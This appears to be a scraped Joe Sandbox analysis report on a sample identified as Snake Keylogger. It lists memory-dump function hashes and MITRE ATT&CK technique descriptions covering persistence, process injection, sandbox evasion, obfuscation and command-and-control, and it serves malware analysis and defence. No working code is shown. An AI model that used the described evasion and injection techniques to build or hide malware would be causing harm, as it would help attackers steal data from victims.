Instruction ID: 0cbf3fb8e4f68891c9a82d7cdb4fd80df53aed51af96ff7f90b6dc647a4e1e05
Opcode Fuzzy Hash: d7c80349d0d0604fbc84bf615173d7b2af06100634c80dc08b1284afad059733
Instruction Fuzzy Hash: 91B18F717141018FDB18BA28C959BB9369AEFC5790F94006AE502DF3A1EE68DC83E741

Function 00F856A8 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7ac2d093c567c461951f653fb1355c7eed88c729bdc79ce18511e1b7b60a1c
Instruction ID: 263c3c3983dcc71af8c55b95bdcfbd18fd2def8a8de202a9fa3717cfb5db72f1
Opcode Fuzzy Hash: ec7ac2d093c567c461951f653fb1355c7eed88c729bdc79ce18511e1b7b60a1c
Instruction Fuzzy Hash: AAB19F31B046158FDB15AF78C894BAE7BE2AF88720F148929E446CB291DF78CC41E791

Function 00F86108 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c783a8f1dc543a51f7023ff8ce03a87759a1c587d30267e7f5692b21a981dd
Instruction ID: bf0047daa5a585e74bb54625c90875fe82fbf94d75e2ecd9e431c0bb2f33d34c
Opcode Fuzzy Hash: 05c783a8f1dc543a51f7023ff8ce03a87759a1c587d30267e7f5692b21a981dd
Instruction Fuzzy Hash: F3919D71A002188FDB14EFA9C954BAEBBF2FF88310F248569E445DB391DB389D41DB90

Function 00F87438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d70238474a14039449a406a83e5a2d33d6e1446d2ed2736473b6940895758a
Instruction ID: be8a0bb8f667b7bd7f41cf61b9cb4482b6b26c16c09cf6ccdda2424d883ed271
Opcode Fuzzy Hash: 52d70238474a14039449a406a83e5a2d33d6e1446d2ed2736473b6940895758a
Instruction Fuzzy Hash: 1E71FC35B086058FDB15FF28C494BA97BE5AF49710F2940A5E805CB3B1DB75DC41DB90

Function 00F83908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744d5fadc69734e539224aad156a1cd0b6d62e641158e81685d786b053045cb0
Instruction ID: c8819632dabcc0136c77418d9d5c39c25f766392fd967c698fac5d730c5bd03e
Opcode Fuzzy Hash: 744d5fadc69734e539224aad156a1cd0b6d62e641158e81685d786b053045cb0
Instruction Fuzzy Hash: AE51B875E01208CFCB48DFA9D49499DBBF6FF89300B609569E805AB324DB35AD41CF40

Function 00F89A63 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61282870bda1b0ce35229d75706f1edd1392726251a3c53aa8f6f33009807c6e
Instruction ID: 216cd0557356e2e05def26ad287abd9da7265873528bd5d916f53daeaabbbae0
Opcode Fuzzy Hash: 61282870bda1b0ce35229d75706f1edd1392726251a3c53aa8f6f33009807c6e
Instruction Fuzzy Hash: 1D41A231A08249DFDF15DFA4C844BEDBFB2AF89360F088155E815AB291D3B5D950EB90

Function 00F8A650 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86779014b40f13dc634d3b1bc743b98f25ab89d4077d5688ddd17f17183f068
Instruction ID: 4c879b1879d50468a83b9f2c66d9a7122167b199a9590b88e459f7001b720305
Opcode Fuzzy Hash: d86779014b40f13dc634d3b1bc743b98f25ab89d4077d5688ddd17f17183f068
Instruction Fuzzy Hash: 4D41D0367042048FDB04AB64D8656AE7BF6FFC8321F14856AE906E7391CE349C01DB91

Function 00F86730 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d9fe506b8970a91b7aef1ed0260257afb39f2f2fca5dcbc1514f89eb275547
Instruction ID: ea2a654fe555cf20b98341c6e4433bfe99a03b28f747687665953f2d264773ee
Opcode Fuzzy Hash: 72d9fe506b8970a91b7aef1ed0260257afb39f2f2fca5dcbc1514f89eb275547
Instruction Fuzzy Hash: 3241C131A00208DFDB10EF64C854BAEBBF6EF84314F04842AE915D7291DB78DD85EBA1

Function 00F83428 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fee9a8c9e28a44e76a0f2d5b160dff86d32380b87de566aecbe142d601ebe2
Instruction ID: 9adc095c0d5166fdbd9aaadd75a8956eee799173986c78e1887e36d19584e7e9
Opcode Fuzzy Hash: 68fee9a8c9e28a44e76a0f2d5b160dff86d32380b87de566aecbe142d601ebe2
Instruction Fuzzy Hash: AE310972F043258BDF19AA6988942BE759AABC4B20F18403DE906C73A4DFB4CE456761

Function 00F83B45 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83777c06ce4de994641a1d904e69f5b40decd29936a19c9cfb1534f7b5a40bbe
Instruction ID: 8f915c1f050629b1d001326126217e494354484cbb5eda579e8e3c430257dab6
Opcode Fuzzy Hash: 83777c06ce4de994641a1d904e69f5b40decd29936a19c9cfb1534f7b5a40bbe
Instruction Fuzzy Hash: 0431DE78E05248CFCB09EFB4D8944ACBBB6FF4A3117200558E989AB365C7319D46EB40

Function 00F876E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a9469d38454cfdd9796b5c0bf21dc5c11fb3d46c506de52e441f6003c4f751f
Instruction ID: cda6d213fca350c628dd4c66c54b18042911a2ecacdd46f8b79d0f5f2daccc76
Opcode Fuzzy Hash: 3a9469d38454cfdd9796b5c0bf21dc5c11fb3d46c506de52e441f6003c4f751f
Instruction Fuzzy Hash: 2521B63570C31147EB1436258895BBE799B9FC8724F384074E606CB798EE65CC81F380

Function 00F8A809 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db117a8fbfdb5ec8941f91f29e7d95b2f2fd17baf459d62f937812a2e468272e
Instruction ID: 63376e8c7ed172146ea9ecd9bb0e6a5e0ef1b0f22295ddc1cd63a225cda41f30
Opcode Fuzzy Hash: db117a8fbfdb5ec8941f91f29e7d95b2f2fd17baf459d62f937812a2e468272e
Instruction Fuzzy Hash: E2319F70E001098FDB04DFA9C889AAEBBB7FF84360B158159E515973A1CB38ED52CB91

Function 00F8D11E Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebcc1c510b800070ebaee904d8cfb1a708fa57f640459c8ffb816bdda6fd75e
Instruction ID: ce91e9355ae08361c56cf2fe57487ae9ebf8c4fe87f49a4f09d7a7b96b308f31
Opcode Fuzzy Hash: aebcc1c510b800070ebaee904d8cfb1a708fa57f640459c8ffb816bdda6fd75e
Instruction Fuzzy Hash: 60314871C106199ECB01EFE8E8586ECFBB4FF5A310F109619E804B7295EB30AA59DB50

Function 00F82060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727ae20ea4512c31876e0d4f4333d72a5edb50290e0c02380d9e9c3a59e376e7
Instruction ID: d0c2689da40c11361b9c5768c3e5946cc3614ccc4eda49ce63d6349725b65a84
Opcode Fuzzy Hash: 727ae20ea4512c31876e0d4f4333d72a5edb50290e0c02380d9e9c3a59e376e7
Instruction Fuzzy Hash: 1721C135A001569FCB54EF64D850AEE77A5EB98360F60C459EC0A9B380DB35FE42CBD1

Function 00F2D4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484298374.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6d2d92b501c7ec5aef739bf943d8fa999462f23434985554e5df78b9755065
Instruction ID: 003f038131c4dbc4364cd7899df16f72cf87da5347d8eae7e9312fa907bc9ec6
Opcode Fuzzy Hash: 2c6d2d92b501c7ec5aef739bf943d8fa999462f23434985554e5df78b9755065
Instruction Fuzzy Hash: E1214872504240DFDB04DF10E9C1B26BF65FB88328F38C568E9090B256C3B6D855EAA2

Function 00F85A70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9dc2d6f2a6246fe180e5d3fd86967eeebbe434668b432368014f60b47ac761
Instruction ID: 05f7ae5771f368728a7c31b059461f171366aef24219e2172d856085ce02d19a
Opcode Fuzzy Hash: 9c9dc2d6f2a6246fe180e5d3fd86967eeebbe434668b432368014f60b47ac761
Instruction Fuzzy Hash: F121C331701A218BD719AA25D4A566EB7A6FFC8B61B144578E806DB390CF34DC029BC0

Function 00F8215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61137f9c5aec738b2c109825e1f51bfbf5803204bad15f08d183d122c649507e
Instruction ID: 5a7fdd8c79605310904320675a574669ce18762449d866c4c144253979aee7a3
Opcode Fuzzy Hash: 61137f9c5aec738b2c109825e1f51bfbf5803204bad15f08d183d122c649507e
Instruction Fuzzy Hash: 2D115B36E052599FCB01ABF89C005DEBB34FF89320F358756D666B7190EA322946C391

Function 00F8D218 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38c28a3658ec2f93acc6e0ca6b05c9b29df8bc469b270f26f515e7c7a5e5d1f
Instruction ID: a218f4f3428e091c77a512d595190b4e733e1e6332a740b22d834639ccd87b2a
Opcode Fuzzy Hash: b38c28a3658ec2f93acc6e0ca6b05c9b29df8bc469b270f26f515e7c7a5e5d1f
Instruction Fuzzy Hash: 752104749012498FDB04EBB0E851AEEB7B2BB8A304F105569D811B72A4CB399D42CF68

Function 00F839ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659fdfb3d1f76c70f0e46e83e66872fe31d2feebee5c6e4a01a3dcb787af03ad
Instruction ID: 0920c1319b3e5f4d18b7a7052a131327951150cc60ce18e255d626db496d3ce1
Opcode Fuzzy Hash: 659fdfb3d1f76c70f0e46e83e66872fe31d2feebee5c6e4a01a3dcb787af03ad
Instruction Fuzzy Hash: E931C678E11248CFCB44EFA8E5949ADBBB6FF49301B204469E819AB324DB31AD45CF00

Function 00F8D228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9309f1a920171578b0686746a5975e13a89237040591441dd6e11f6c5caf0b0
Instruction ID: eb375bbe716c9e402003e274c8e477e0d6c22e377f35e80aa5748647ce6a502f
Opcode Fuzzy Hash: f9309f1a920171578b0686746a5975e13a89237040591441dd6e11f6c5caf0b0
Instruction Fuzzy Hash: DE2106749012088BDB04EFB0E851AEEB7B2FF89305F105429D81177394CB35AD41CF68

Function 00F2D4EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484298374.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 7c465668522aa8ab90cebd2cee977616550da932ca905a51bc189205b494d2d5
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 8011D376904284CFCB15CF10D5C4B16BF71FB94328F28C5A9D8090B256C37AD85ADBA1

Function 00F85607 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a978413565ae4b6fad273b1c1b0dc49b7b0a4b9d513b6eaf8681c97ff9848054
Instruction ID: 3cf49d035901120f81d9d04324a0ee0bbb5ccdacc8ad1c0248afe4c72da4042f
Opcode Fuzzy Hash: a978413565ae4b6fad273b1c1b0dc49b7b0a4b9d513b6eaf8681c97ff9848054
Instruction Fuzzy Hash: 3C012472B001146BDB019E54DC21BEF3BEADFC8760F188029F504E7280DE39CD12ABA0

Function 00F82010 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c0d9d4da08a9255ae365a8b228c1de8f7197e162d0c85256f345eb2931bfc6
Instruction ID: d820ace5fca12e5fed8cd2f8ca74030d3543103c34e00b5e6d98ebd16da542b1
Opcode Fuzzy Hash: 14c0d9d4da08a9255ae365a8b228c1de8f7197e162d0c85256f345eb2931bfc6
Instruction Fuzzy Hash: E6E0DF37C213664ACB029BA0E8440DDBB30FF96221B0A5597D42067051FB702A0A8BA0

Function 00F82020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1bc21d38ad724437e17dd1997e0c0f28591a134fb6182b6224deb12318f984
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: cf1bc21d38ad724437e17dd1997e0c0f28591a134fb6182b6224deb12318f984
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 00F88258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 02fd0815de1b5eca37ca3c8bd6168689e2f722daf8ab137b377733089445190a
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: ECC0123360C1282AA624608E7C40AE3AB8CC2C27F4A650137F91CE3200A842AC8222A8

Function 00F8A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2484639496.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f80000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa550aab80a0f8890ec8f59f2c65e37f08ed3547d493c46ebb6b42c4875a982
Instruction ID: 8db3210290ec99b1767a7656a6ca15369f8bec327e76d4b43d485045dd0bc402
Opcode Fuzzy Hash: 7aa550aab80a0f8890ec8f59f2c65e37f08ed3547d493c46ebb6b42c4875a982
Instruction Fuzzy Hash: A7D0677AB111089FDB049F98E8509DDB7B6FB9C221B048126F915A3260C6319961DB50

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking
